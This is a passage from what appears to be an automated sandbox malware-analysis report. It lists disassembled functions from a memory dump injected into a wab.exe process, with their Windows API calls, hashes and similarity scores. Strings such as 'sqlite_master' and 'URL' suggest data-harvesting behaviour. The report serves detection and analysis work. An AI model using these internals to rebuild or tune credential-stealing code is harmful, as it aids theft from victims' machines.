                                                                                                                                                                                          • API String ID: 1127616056-0
                                                                                                                                                                                          • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                          • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                          • String ID: sqlite_master
                                                                                                                                                                                          • API String ID: 438689982-3163232059
                                                                                                                                                                                          • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                          • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                                                          • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3917621476-0
                                                                                                                                                                                          • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                          • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                                                          • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                          • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                          • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 822687973-0
                                                                                                                                                                                          • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                          • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                          • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76FBDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                          • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,76FBDF80,?,0041755F,?), ref: 00417478
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4284152360-0
                                                                                                                                                                                          • Opcode ID: 0b7bfc55a2a68b0b8501ca6e60a43b9d2137669aaa69feff2bcc87c38bff4882
                                                                                                                                                                                          • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b7bfc55a2a68b0b8501ca6e60a43b9d2137669aaa69feff2bcc87c38bff4882
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                                          • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2678498856-0
                                                                                                                                                                                          • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                          • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                                          • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                          • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Item
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3888421826-0
                                                                                                                                                                                          • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                          • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                                                          • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                          • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                          • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                          • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3727323765-0
                                                                                                                                                                                          • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                          • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                          • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004173E4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                          • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4284152360-0
                                                                                                                                                                                          • Opcode ID: 216751ef8fd097c825dd04e316b9a1fd88e5245b1c8a55e2c2eb04db0303a8de
                                                                                                                                                                                          • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 216751ef8fd097c825dd04e316b9a1fd88e5245b1c8a55e2c2eb04db0303a8de
                                                                                                                                                                                          • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2754987064-0
                                                                                                                                                                                          • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                          • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2754987064-0
                                                                                                                                                                                          • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                          • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                          • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                          • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2754987064-0
                                                                                                                                                                                          • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                          • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                                                          • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                          • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                            • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                            • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                          • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 764393265-0
                                                                                                                                                                                          • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                          • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                                          • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 979780441-0
                                                                                                                                                                                          • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                          • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004134E0
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004134F2
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                          • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1386444988-0
                                                                                                                                                                                          • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                          • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                                          • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                          • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InvalidateMessageRectSend
                                                                                                                                                                                          • String ID: d=E
                                                                                                                                                                                          • API String ID: 909852535-3703654223
                                                                                                                                                                                          • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                          • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                                                          • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                            • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: wcschr$memcpywcslen
                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                          • API String ID: 1983396471-123907689
                                                                                                                                                                                          • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                          • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                                          • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                          • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040C024
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                          • String ID: URL
                                                                                                                                                                                          • API String ID: 2108176848-3574463123
                                                                                                                                                                                          • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
